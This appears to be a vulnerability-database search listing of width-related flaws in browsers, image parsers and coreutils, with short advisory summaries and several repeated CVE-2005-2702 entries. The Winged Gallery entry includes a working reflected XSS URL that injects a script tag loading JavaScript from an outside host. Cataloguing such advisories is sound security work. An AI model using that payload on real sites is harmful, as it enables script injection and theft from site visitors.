1082 matches found
IE CSS畸形宽度单元标记拒绝服务漏洞
Internet Explorer是微软发布的非常流行的WEB浏览器。 Internet Explorer在处理畸形的HTML标记时存在漏洞,远程攻击者可能利用此漏洞导致用户机器不可用。 如果用户使用IE访问了设置有特制CSS宽度单元的WEB页面的话,就会导致iexplore.exe耗尽100%的CPU资源。 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 7 Beta 2 Microsoft Internet Explorer 7 Beta 1 Microsoft Internet Explorer 6.0 SP1...
CVE-2006-6311
Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service via a style attribute in an HTML table tag with a width value that is dynamically calculated using JavaScript...
CVE-2006-6238
The AutoFill feature in Apple Safari 2.0.4 does not properly verify that all automatically populated form fields are visible to the user, which allows remote attackers to obtain sensitive information, such as usernames and passwords, via input fields of zero width, a variant of CVE-2006-6077...
Winged Gallery v1.0
Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...
CVE-2005-3710
Integer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a TIFF image file with modified image height and width ImageWidth tags...
security flaw
Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via Unicode sequences with "zero-width non-joiner" characters...
CVE-2005-2702
Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via Unicode sequences with "zero-width non-joiner" characters...
CVE-2005-2702
Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via Unicode sequences with "zero-width non-joiner" characters...
CVE-2005-2702
CVE-2005-2702 affects Mozilla/Firefox: vulnerable when processing Unicode sequences, specifically zero-width non-joiner characters. Firefox prior to 1.0.7 and Mozilla Suite prior to 1.7.12 are at risk. Reported impact: remote attacker could cause a crash and, in some scenarios, may execute arbitr...
CVE-2005-2702
Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via Unicode sequences with "zero-width non-joiner" characters...
security flaw
Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via Unicode sequences with "zero-width non-joiner" characters...
security flaw
Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via Unicode sequences with "zero-width non-joiner" characters...
CVE-2004-2179
asycpict.dll, as used in Microsoft products such as Front Page 97 and 98, allows remote attackers to cause a denial of service hang via a JPEG image with maximum height and width values...
CVE-2005-1142
Heap-based buffer overflow in the readpgm function in pnm.c for GOCR 0.40, when it is not using netpbm, allows remote attackers to execute arbitrary code via a P3 format PNM file with more data than implied by its width and height values...
Coreutils 4.5.x - LS Width Argument Integer Overflow
Coreutils 4.5.x - LS Width Argument Integer Overflow source: https://www.securityfocus.com/bid/8875/info Coreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. It has been...
DEBIAN-CVE-2002-1277
Buffer overflow in Window Maker wmaker 0.80.0 and earlier may allow remote attackers to execute arbitrary code via a certain image file that is not properly handled when Window Maker uses width and height information to allocate a buffer...
zero-width gif: exploit PoC for NS6.2.3 (fixed in 7.0) [Was: GIFs Good, Flash Executable Bad]
On Tue Sep 03 2002, Blue Boar wrote: This is one of my favorite vulnerabilities: http://online.securityfocus.com/bid/1503 It's an overflow in the JPEG handler in Netscape. I don't know of one for GIFs off the top of my head, but the same principle applies. If there's a viewer with a bug, then the...
GIF buffer overflow in Mozilla/Netscape
Heap overflow on zero width GIF images...
CVE-2002-0090
Buffer overflow in Low BandWidth X proxy lbxproxy in Solaris 8 allows local users to execute arbitrary code via a long display command line option...
msie4.width.000.txt
Jim Paris http://home.jtan.com/jim/bugs/ie/width.html Internet Explorer 4.x "width=000..." bug Some versions of Microsoft Internet Explorer will crash when given a long "width=" or "height=" string in an image tag under the correct circumstances. In most cases, IE will stop parsing the "width="...